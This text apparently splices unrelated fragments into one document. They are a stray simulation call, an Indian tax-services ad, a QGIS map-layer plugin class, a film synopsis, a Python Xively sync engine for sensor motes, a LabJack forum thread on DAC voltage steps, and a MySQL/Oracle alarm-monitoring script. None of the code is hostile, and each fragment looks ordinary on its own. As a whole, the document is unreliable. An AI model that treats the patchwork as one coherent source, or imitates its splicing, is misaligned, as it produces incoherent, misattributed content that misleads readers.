    Dynamics(rdx,get_energy_forces,nsteps=3,Ti=4000)
|
We follow a well-defined service plan and are supported by professionals with rich industry experience. This gives our global clients easy access to different entry options in India. Services such as "Setting up business in India" are rendered as per the rules and regulations set by the governing bodies. We are professional taxation service providers from India, and our experts provide valuable financial and investment solutions to clients in the United Kingdom.
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
OpenLayers Plugin
A QGIS plugin
-------------------
begin : 2009-11-30
copyright : (C) 2009 by Pirmin Kalberer, Sourcepole
email : pka at sourcepole.ch
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from weblayer import WebLayer3857
class OlAppleiPhotoMapLayer(WebLayer3857):
    """OpenLayers plugin layer for the Apple iPhoto map (EPSG:3857 base)."""
    # NOTE(review): presumably tells the plugin framework this layer's HTML
    # page emits a load-end event -- confirm against the WebLayer base class.
    emitsLoadEnd = True
    def __init__(self):
        # Register under the "Apple Maps" group, backed by apple.html.
        WebLayer3857.__init__(self, groupName="Apple Maps", groupIcon="apple_icon.png",
            name='Apple iPhoto map', html='apple.html')
|
Rarely can a film infiltrate the glamorous surface of rock legends. IT MIGHT GET LOUD tells the personal stories, in their own words, of three generations of electric guitar virtuosos - The Edge (U2), Jimmy Page (Led Zeppelin), and Jack White (The White Stripes). It reveals how each developed his unique sound and style of playing favorite instruments, guitars both found and invented.
Concentrating on the artist's musical rebellion, traveling with him to influential locations, provoking rare discussion as to how and why he writes and plays, this film lets you witness intimate moments and hear new music from each artist.
The movie revolves around a day when Jimmy Page, Jack White, and The Edge first met and sat down together to share their stories, teach and play.
|
#!/usr/bin/python
import logging
class NullHandler(logging.Handler):
    # No-op handler so the module emits nothing unless the host app
    # configures logging. (Equivalent to logging.NullHandler in Python 2.7+.)
    def emit(self, record):
        pass
# Module logger; ERROR level and a null handler by default.
log = logging.getLogger('XivelySyncEngine')
log.setLevel(logging.ERROR)
log.addHandler(NullHandler())
import time
import copy
import threading
from pydispatch import dispatcher
from EventBus import EventBusClient
from DustLinkData import DustLinkData
from SmartMeshSDK import FormatUtils
from SmartMeshSDK.protocols.xivelyConnector import xivelyConnector
class XivelySyncEngine(EventBusClient.EventBusClient):
    """Synchronizes mirrored mote data with the Xively cloud service.

    Listens for 'newDataMirrored' events on the event bus, lazily
    (re)connects to Xively using the API key stored in DustLinkData,
    publishes each incoming datapoint, and subscribes to a mote's 'led'
    datastream when the data asks for it so LED commands flow back to
    the mesh. All counters in self.status are guarded by statusLock.
    """
    CHECKDELAY = 5 # in s, delay between checks of whether an API key is set
    def __init__(self):
        """Initialize state/counters and register event-bus callbacks."""
        # log
        log.info('creating instance')
        # store params
        # local variables
        self.connector = None
        self.lastCheck = None
        self.xivelyApiKey = None
        self.subscribedMotes = []
        self.statusLock = threading.Lock()
        self.status = {}
        self.status['apiKeySet'] = 'WAIT...'
        self.status['status'] = 'DISCONNECTED'
        self.status['numConnectionsOK'] = 0
        self.status['numConnectionsFailed'] = 0
        self.status['numSubscriptionsFailed'] = 0
        self.status['lastConnected'] = None
        self.status['lastDisconnected'] = None
        self.status['numPublishedOK'] = 0
        self.status['numPublishedFail'] = 0
        # initialize parent class
        EventBusClient.EventBusClient.__init__(self,
            signal = 'newDataMirrored',
            cb = self._publish,
            teardown_cb = self._cleanup,
        )
        self.name = 'DataConnector_xivelyConnector'
        # connect extra events
        dispatcher.connect(
            self.getStatus,
            signal = 'xivelystatus',
            weak = False,
        )
        # add stats
    #======================== public ==========================================
    def getStatus(self):
        """Return a deep copy of the status/counter dictionary (thread-safe)."""
        with self.statusLock:
            return copy.deepcopy(self.status)
    #======================== private =========================================
    def _cleanup(self):
        """Teardown hook: detach the extra dispatcher connection."""
        # disconnect extra events
        dispatcher.disconnect(
            self.getStatus,
            signal = 'xivelystatus',
            weak = False,
        )
    def _publish(self,sender,signal,data):
        """Handle one 'newDataMirrored' event.

        Periodically (every CHECKDELAY s) re-reads the Xively API key and
        connects/disconnects accordingly, then publishes the datapoint in
        *data* and, if requested, subscribes to the mote's 'led' stream.
        data is expected to carry at least 'mac', 'type' and 'lastvalue'.
        """
        now = time.time()
        dld = DustLinkData.DustLinkData()
        mac = data['mac']
        #========== connect/disconnect
        if (self.lastCheck==None) or (now-self.lastCheck>self.CHECKDELAY):
            # remember I just checked
            self.lastCheck = now
            # we need to use "raw" access because dld.getPublisherSettings()
            # does not return all settings
            settings = dld.get(['system','publishers','xively'])
            # record the xivelyApiKey
            xivelyApiKey = None
            if ('xivelyApiKey' in settings) and settings['xivelyApiKey']:
                xivelyApiKey = settings['xivelyApiKey']
            # update status
            if xivelyApiKey==None:
                with self.statusLock:
                    self.status['apiKeySet'] = 'NO'
            else:
                with self.statusLock:
                    self.status['apiKeySet'] = 'YES'
            # decide whether to connect/disconnect
            if (not self.connector) and xivelyApiKey:
                # connect
                # log
                log.info("Connecting to Xively")
                # remember API key
                self.xivelyApiKey = xivelyApiKey
                # connect
                try:
                    self.connector = xivelyConnector.xivelyConnector(
                        apiKey = self.xivelyApiKey,
                        productName = 'SmartMesh IP Starter Kit',
                        productDesc = 'Connecting using DustLink',
                    )
                except Exception as err:
                    # log
                    log.error("Error while connecting to Xively: {0}".format(err))
                    # update status
                    with self.statusLock:
                        self.status['status'] = 'CONNECTION FAILED'
                        self.status['numConnectionsFailed']+= 1
                    # disconnect
                    self._disconnect()
                else:
                    # update status
                    with self.statusLock:
                        self.status['status'] = 'CONNECTED'
                        self.status['numConnectionsOK'] += 1
                        self.status['lastConnected'] = dld.timestampToStringShort(now)
            # drop the connection when the key was removed or replaced
            elif ((self.connector) and (not xivelyApiKey)) or (self.xivelyApiKey!=xivelyApiKey):
                # disconnect
                self._disconnect()
        #========== publish data
        if self.connector:
            try:
                self.connector.publish(
                    mac = data['mac'],
                    datastream = data['type'],
                    value = data['lastvalue'],
                )
            except Exception as err:
                # log
                log.error(
                    "Error while publishing to {0}/{1}: {2}".format(
                        FormatUtils.formatMacString(mac),
                        data['type'],
                        err,
                    )
                )
                # update status
                with self.statusLock:
                    self.status['numPublishedFail'] += 1
                # disconnect
                self._disconnect()
            else:
                # update status
                with self.statusLock:
                    self.status['numPublishedOK'] += 1
        #========== subscribe
        if self.connector:
            if mac not in self.subscribedMotes:
                try:
                    if ('subscribeToLed' in data) and (data['subscribeToLed']):
                        # create datastream
                        self.connector.publish(
                            mac = mac,
                            datastream = 'led',
                            value = 0,
                        )
                        # subscribe
                        self.connector.subscribe(
                            mac = mac,
                            datastream = 'led',
                            callback = self._led_cb,
                        )
                except Exception as err:
                    # log
                    log.error(
                        "Error while subscribing to {0}/{1}: {2}".format(
                            FormatUtils.formatMacString(mac),
                            'led',
                            err,
                        )
                    )
                    # update status
                    with self.statusLock:
                        self.status['status'] = 'SUBSCRIPTION FAILED'
                        self.status['numSubscriptionsFailed'] += 1
                    # disconnect
                    self._disconnect()
                else:
                    # NOTE(review): the mote is marked subscribed even when
                    # 'subscribeToLed' was absent/false -- confirm intended.
                    self.subscribedMotes += [mac]
    def _disconnect(self):
        """Close the Xively connector and reset connection state."""
        now = time.time()
        dld = DustLinkData.DustLinkData()
        # log
        log.info("Disconnecting from Xively")
        # close connector
        try:
            self.connector.close()
        except Exception:
            pass # happens when no active subscription
        # reset variables
        self.connector = None
        self.xivelyApiKey = None
        self.subscribedMotes = []
        # update status
        with self.statusLock:
            self.status['status'] = 'DISCONNECTED'
            self.status['lastDisconnected'] = dld.timestampToStringShort(now)
    def _led_cb(self,mac,datastream,value):
        """Xively subscription callback: forward an LED command to the mesh."""
        # all non-0 values turn LED on
        if value==0:
            value = 0
        else:
            value = 1
        dispatcher.send(
            signal = 'fieldsToMesh_OAPLED',
            data = {
                'mac': mac,
                'fields': {
                    'status': value,
                },
            }
        )
|
LJ_chDAC_BINARY //If set nonzero put_dac values should be 0-65535.
//Set DAC0 to 2.5 volts.
The LJ_ioPUT_DAC seems to program an 8-bit voltage but the device has a 10-bit dac. Is there a different iotype for 10-bit commands?
You mean that you are seeing 20 mV steps? Make sure you have a current UD driver and U3 firmware. Go to the "config defaults" section of LJControlPanel and make sure 8-bit DAC mode is not selected.
Yes. I see 20mV steps rather than the 5mV expected. The firmware is 1.32, which appears to be up to date. The driver is 3.15, which seems to be up to date too. (I was not able to run 3.24 for some reason.) The 8-bit mode is not selected.
What sort of problem do you have with the 3.24 installer? I would tackle that so you are using a current driver before you do much more troubleshooting. Perhaps post a comment on that page with the problem.
After we get your driver updated, can you test the DACs using the test panel in LJControlPanel, if that is not what you are doing already?
Also, confirm that LJCP reports hardware version 1.30 for your U3.
When I send 5.0 to my U6 I get 0v out. I have had to cap at 4.9 to ensure an output voltage.
Do your DAC troubleshooting with no load on the DAC. Do you see this using the test panel in LJControlPanel? How are you measuring the voltage output?
I am using a U6 device.
Can the value of the Analog Output be read back?
|
#!/bin/env python
#-*-coding:utf-8-*-
import os
import sys
import string
import time
import datetime
import MySQLdb
import logging
import logging.config
# Load the logging configuration and grab the application logger.
logging.config.fileConfig("etc/logger.ini")
logger = logging.getLogger("wlblazers")
# Make the bundled ./include directory importable for the helper modules.
path='./include'
sys.path.insert(0,path)
import functions as func
import sendmail
import sendsms_fx
import sendsms_api
# Global alarm-notification settings read once at startup.
# (A duplicate fetch of 'send_mail_sleep_time' was removed.)
send_mail_max_count = func.get_option('send_mail_max_count')
send_mail_sleep_time = func.get_option('send_mail_sleep_time')
mail_to_list_common = func.get_option('send_mail_to_list')
send_sms_max_count = func.get_option('send_sms_max_count')
send_sms_sleep_time = func.get_option('send_sms_sleep_time')
sms_to_list_common = func.get_option('send_sms_to_list')
def get_alarm_mysql_status():
    """Check the latest MySQL status sample for every monitored server.

    Raises/clears alarms for connectivity and for the threads_connected,
    threads_running and threads_waits counters against each server's
    warning/critical thresholds, and updates the dashboard status rows.
    """
    sql="select a.server_id,a.connect,a.threads_connected,a.threads_running,a.threads_waits,a.create_time,a.host,a.port,b.alarm_threads_connected,b.alarm_threads_running,alarm_threads_waits,b.threshold_warning_threads_connected,b.threshold_critical_threads_connected,b.threshold_warning_threads_running,b.threshold_critical_threads_running,threshold_warning_threads_waits,threshold_critical_threads_waits,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mysql' as db_type from mysql_status a, db_cfg_mysql b where a.server_id=b.id;"
    result=func.mysql_query(sql)
    # mysql_query() returns 0 when there are no rows.
    if result != 0:
        for line in result:
            server_id=line[0]
            connect=line[1]
            threads_connected=line[2]
            threads_running=line[3]
            threads_waits=line[4]
            create_time=line[5]
            host=line[6]
            port=line[7]
            alarm_threads_connected=line[8]
            alarm_threads_running=line[9]
            alarm_threads_waits=line[10]
            threshold_warning_threads_connected=line[11]
            threshold_critical_threads_connected=line[12]
            threshold_warning_threads_running=line[13]
            threshold_critical_threads_running=line[14]
            threshold_warning_threads_waits=line[15]
            threshold_critical_threads_waits=line[16]
            send_mail=line[17]
            send_mail_to_list=line[18]
            send_sms=line[19]
            send_sms_to_list=line[20]
            tags=line[21]
            db_type=line[22]
            # Fall back to the global recipient lists when none configured.
            if send_mail_to_list is None or send_mail_to_list.strip()=='':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip()=='':
                send_sms_to_list = sms_to_list_common
            if connect != 1:
                # Server unreachable: critical alarm, mark all metrics unknown.
                send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
                func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','mysql server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
                func.update_db_status('sessions','-1',host,port,'','','','')
                func.update_db_status('actives','-1',host,port,'','','','')
                func.update_db_status('waits','-1',host,port,'','','','')
                func.update_db_status('repl','-1',host,port,'','','','')
                func.update_db_status('repl_delay','-1',host,port,'','','','')
            else:
                func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','mysql server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
                if int(alarm_threads_connected)==1:
                    if int(threads_connected)>=int(threshold_critical_threads_connected):
                        send_mail = func.update_send_mail_status(server_id,db_type,'threads_connected',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'threads_connected',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'critical','too many threads connected',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',3,host,port,create_time,'threads_connected',threads_connected,'critical')
                    elif int(threads_connected)>=int(threshold_warning_threads_connected):
                        send_mail = func.update_send_mail_status(server_id,db_type,'threads_connected',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'threads_connected',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'warning','too many threads connected',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',2,host,port,create_time,'threads_connected',threads_connected,'warning')
                    else:
                        func.update_db_status('sessions',1,host,port,create_time,'threads_connected',threads_connected,'ok')
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_connected',threads_connected,'threads connected ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                if int(alarm_threads_running)==1:
                    if int(threads_running)>=int(threshold_critical_threads_running):
                        send_mail = func.update_send_mail_status(server_id,db_type,'threads_running',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'threads_running',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'critical','too many threads running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',3,host,port,create_time,'threads_running',threads_running,'critical')
                    elif int(threads_running)>=int(threshold_warning_threads_running):
                        send_mail = func.update_send_mail_status(server_id,db_type,'threads_running',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'threads_running',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'warning','too many threads running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',2,host,port,create_time,'threads_running',threads_running,'warning')
                    else:
                        func.update_db_status('actives',1,host,port,create_time,'threads_running',threads_running,'ok')
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_running',threads_running,'threads running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                if int(alarm_threads_waits)==1:
                    if int(threads_waits)>=int(threshold_critical_threads_waits):
                        send_mail = func.update_send_mail_status(server_id,db_type,'threads_waits',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'threads_waits',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'critical','too many threads waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',3,host,port,create_time,'threads_waits',threads_waits,'critical')
                    # BUG FIX: this branch previously compared against
                    # threshold_warning_threads_running by mistake.
                    elif int(threads_waits)>=int(threshold_warning_threads_waits):
                        send_mail = func.update_send_mail_status(server_id,db_type,'threads_waits',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'threads_waits',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'warning','too many threads waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',2,host,port,create_time,'threads_waits',threads_waits,'warning')
                    else:
                        func.update_db_status('waits',1,host,port,create_time,'threads_waits',threads_waits,'ok')
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'threads_waits',threads_waits,'threads waits ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
    else:
        pass
def get_alarm_mysql_replcation():
    """Check MySQL slave replication health (IO/SQL threads and delay).

    For each configured slave, raises a critical alarm when either
    replication thread is stopped; when both run, optionally alarms on
    replication delay against the warning/critical thresholds.
    (Function name typo "replcation" is kept for caller compatibility.)
    """
    sql = "select a.server_id,a.slave_io_run,a.slave_sql_run,a.delay,a.create_time,b.host,b.port,b.alarm_repl_status,b.alarm_repl_delay,b.threshold_warning_repl_delay,b.threshold_critical_repl_delay,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mysql' as db_type from mysql_dr_s a, db_cfg_mysql b where a.server_id=b.id and a.is_slave='1';"
    result=func.mysql_query(sql)
    # mysql_query() returns 0 when there are no rows.
    if result <> 0:
        for line in result:
            server_id=line[0]
            slave_io_run=line[1]
            slave_sql_run=line[2]
            delay=line[3]
            create_time=line[4]
            host=line[5]
            port=line[6]
            alarm_repl_status=line[7]
            alarm_repl_delay=line[8]
            threshold_warning_repl_delay=line[9]
            threshold_critical_repl_delay=line[10]
            send_mail=line[11]
            send_mail_to_list=line[12]
            send_sms=line[13]
            send_sms_to_list=line[14]
            tags=line[15]
            db_type=line[16]
            # Fall back to the global recipient lists when none configured.
            if send_mail_to_list is None or send_mail_to_list.strip()=='':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip()=='':
                send_sms_to_list = sms_to_list_common
            if int(alarm_repl_status)==1:
                if (slave_io_run== "Yes") and (slave_sql_run== "Yes"):
                    # Both replication threads running: replication is healthy.
                    func.check_if_ok(server_id,tags,host,port,create_time,db_type,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'replication ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                    func.update_db_status('repl',1,host,port,create_time,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'ok')
                    # Delay is only evaluated while replication itself is up.
                    if int(alarm_repl_delay)==1:
                        if int(delay)>=int(threshold_critical_repl_delay):
                            send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
                            send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
                            func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'critical','replication has delay',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                            func.update_db_status('repl_delay',3,host,port,create_time,'repl_delay',delay,'critical')
                        elif int(delay)>=int(threshold_warning_repl_delay):
                            send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
                            send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
                            func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'warning','replication has delay',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                            func.update_db_status('repl_delay',2,host,port,create_time,'repl_delay',delay,'warning')
                        else:
                            func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl_delay',delay,'replication delay ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                            func.update_db_status('repl_delay',1,host,port,create_time,'repl_delay',delay,'ok')
                else:
                    # At least one replication thread stopped: critical alarm.
                    send_mail = func.update_send_mail_status(server_id,db_type,'replication',send_mail,send_mail_max_count)
                    send_sms = func.update_send_sms_status(server_id,db_type,'replication',send_sms,send_sms_max_count)
                    func.add_alarm(server_id,tags,host,port,create_time,db_type,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'critical','replication stop',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                    func.update_db_status('repl',3,host,port,create_time,'replication','IO:'+slave_io_run+',SQL:'+slave_sql_run,'critical')
                    func.update_db_status('repl_delay','-1',host,port,'','','','')
    else:
        pass
def get_alarm_oracle_status():
    """Check the latest Oracle status sample for every monitored server.

    Raises/clears alarms for connectivity, session totals/actives/waits,
    flashback-space usage, and (for physical standbys) Data Guard apply
    delay and MRP process state, updating the dashboard status rows.
    """
    sql = """SELECT a.server_id,
             a.connect,
             a.session_total,
             a.session_actives,
             a.session_waits,
             CONVERT(a.flashback_space_used, DECIMAL(10,2)) as flashback_space_used,
             a.database_role,
             a.dg_stats,
             a.dg_delay,
             a.create_time,
             b.HOST,
             b.PORT,
             b.alarm_session_total,
             b.alarm_session_actives,
             b.alarm_session_waits,
             b.alarm_fb_space,
             b.threshold_warning_session_total,
             b.threshold_critical_session_total,
             b.threshold_warning_session_actives,
             b.threshold_critical_session_actives,
             b.threshold_warning_session_waits,
             b.threshold_critical_session_waits,
             b.threshold_warning_fb_space,
             b.threshold_critical_fb_space,
             b.send_mail,
             b.send_mail_to_list,
             b.send_sms,
             b.send_sms_to_list,
             b.tags,
             'oracle' AS db_type
        FROM oracle_status a, db_cfg_oracle b
       WHERE a.server_id = b.id """
    result=func.mysql_query(sql)
    # mysql_query() returns 0 when there are no rows.
    if result != 0:
        for line in result:
            server_id=line[0]
            connect=line[1]
            session_total=line[2]
            session_actives=line[3]
            session_waits=line[4]
            flashback_space_used=line[5]
            database_role=line[6]
            mrp_status=line[7]
            dg_delay=line[8]
            create_time=line[9]
            host=line[10]
            port=line[11]
            alarm_session_total=line[12]
            alarm_session_actives=line[13]
            alarm_session_waits=line[14]
            alarm_fb_space=line[15]
            threshold_warning_session_total=line[16]
            threshold_critical_session_total=line[17]
            threshold_warning_session_actives=line[18]
            threshold_critical_session_actives=line[19]
            threshold_warning_session_waits=line[20]
            threshold_critical_session_waits=line[21]
            threshold_warning_fb_space=line[22]
            threshold_critical_fb_space=line[23]
            send_mail=line[24]
            send_mail_to_list=line[25]
            send_sms=line[26]
            send_sms_to_list=line[27]
            tags=line[28]
            db_type=line[29]
            # Fall back to the global recipient lists when none configured.
            if send_mail_to_list is None or send_mail_to_list.strip()=='':
                send_mail_to_list = mail_to_list_common
            if send_sms_to_list is None or send_sms_to_list.strip()=='':
                send_sms_to_list = sms_to_list_common
            if connect != 1:
                # Server unreachable: critical alarm, mark all metrics unknown.
                send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
                send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
                func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','oracle server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
                func.update_db_status('sessions','-1',host,port,'','','','')
                func.update_db_status('actives','-1',host,port,'','','','')
                func.update_db_status('waits','-1',host,port,'','','','')
                func.update_db_status('repl','-1',host,port,'','','','')
                func.update_db_status('repl_delay','-1',host,port,'','','','')
            else:
                func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','oracle server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
                if int(alarm_session_total)==1:
                    if int(session_total) >= int(threshold_critical_session_total):
                        send_mail = func.update_send_mail_status(server_id,db_type,'session_total',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'session_total',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'critical','too many sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',3,host,port,create_time,'session_total',session_total,'critical')
                    elif int(session_total) >= int(threshold_warning_session_total):
                        send_mail = func.update_send_mail_status(server_id,db_type,'session_total',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'session_total',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'warning','too many sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',2,host,port,create_time,'session_total',session_total,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_total',session_total,'sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('sessions',1,host,port,create_time,'session_total',session_total,'ok')
                if int(alarm_session_actives)==1:
                    if int(session_actives) >= int(threshold_critical_session_actives):
                        send_mail = func.update_send_mail_status(server_id,db_type,'session_actives',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'session_actives',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'critical','too many active sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',3,host,port,create_time,'session_actives',session_actives,'critical')
                    elif int(session_actives) >= int(threshold_warning_session_actives):
                        send_mail = func.update_send_mail_status(server_id,db_type,'session_actives',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'session_actives',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'warning','too many active sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',2,host,port,create_time,'session_actives',session_actives,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_actives',session_actives,'active sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('actives',1,host,port,create_time,'session_actives',session_actives,'ok')
                if int(alarm_session_waits)==1:
                    if int(session_waits) >= int(threshold_critical_session_waits):
                        send_mail = func.update_send_mail_status(server_id,db_type,'session_waits',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'session_waits',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'critical','too many waits sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',3,host,port,create_time,'session_waits',session_waits,'critical')
                    elif int(session_waits) >= int(threshold_warning_session_waits):
                        send_mail = func.update_send_mail_status(server_id,db_type,'session_waits',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'session_waits',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'warning','too many waits sessions',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',2,host,port,create_time,'session_waits',session_waits,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'session_waits',session_waits,'waits sessions ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('waits',1,host,port,create_time,'session_waits',session_waits,'ok')
                if int(alarm_fb_space)==1:
                    if int(flashback_space_used) >= int(threshold_critical_fb_space):
                        send_mail = func.update_send_mail_status(server_id,db_type,'flashback_space_used',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'flashback_space_used',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'critical','flashback space usage reach %s'%(flashback_space_used),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        # BUG FIX: this row previously updated the 'waits'
                        # status instead of 'flashback_space' (compare the
                        # warning/ok branches below).
                        func.update_db_status('flashback_space',3,host,port,create_time,'flashback_space_used',flashback_space_used,'critical')
                    elif int(flashback_space_used) >= int(threshold_warning_fb_space):
                        send_mail = func.update_send_mail_status(server_id,db_type,'flashback_space_used',send_mail,send_mail_max_count)
                        send_sms = func.update_send_sms_status(server_id,db_type,'flashback_space_used',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'warning','flashback space usage reach %s'%(flashback_space_used),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('flashback_space',2,host,port,create_time,'flashback_space_used',flashback_space_used,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'flashback_space_used',flashback_space_used,'flashback space ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                        func.update_db_status('flashback_space',1,host,port,create_time,'flashback_space_used',flashback_space_used,'ok')
                if database_role=="PHYSICAL STANDBY":
                    # Data Guard standby: alarm on apply delay > 3h or a
                    # stopped MRP (managed recovery) process.
                    if int(dg_delay) >= 3600*3 or int(mrp_status) < 1:
                        if int(dg_delay) >= 3600*3:
                            send_mail = func.update_send_mail_status(server_id,db_type,'repl_delay',send_mail,send_mail_max_count)
                            send_sms = func.update_send_sms_status(server_id,db_type,'repl_delay',send_sms,send_sms_max_count)
                            func.add_alarm(server_id,tags,host,port,create_time,db_type,'repl_delay',dg_delay,'warning','replication delay more than 3 hours',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                            # NOTE(review): status code 3 (critical level) is
                            # written with severity text 'warning' -- confirm
                            # whether this mismatch is intentional.
                            func.update_db_status('repl_delay',3,host,port,create_time,'repl_delay',dg_delay,'warning')
                        if int(mrp_status) < 1:
                            send_mail = func.update_send_mail_status(server_id,db_type,'mrp_status',send_mail,send_mail_max_count)
                            send_sms = func.update_send_sms_status(server_id,db_type,'mrp_status',send_sms,send_sms_max_count)
                            func.add_alarm(server_id,tags,host,port,create_time,db_type,'mrp_status',mrp_status,'warning','MRP process is down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
                            func.update_db_status('repl',2,host,port,create_time,'mrp_status',mrp_status,'warning')
                    else:
                        func.check_if_ok(server_id,tags,host,port,create_time,db_type,'repl',mrp_status,'replication ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
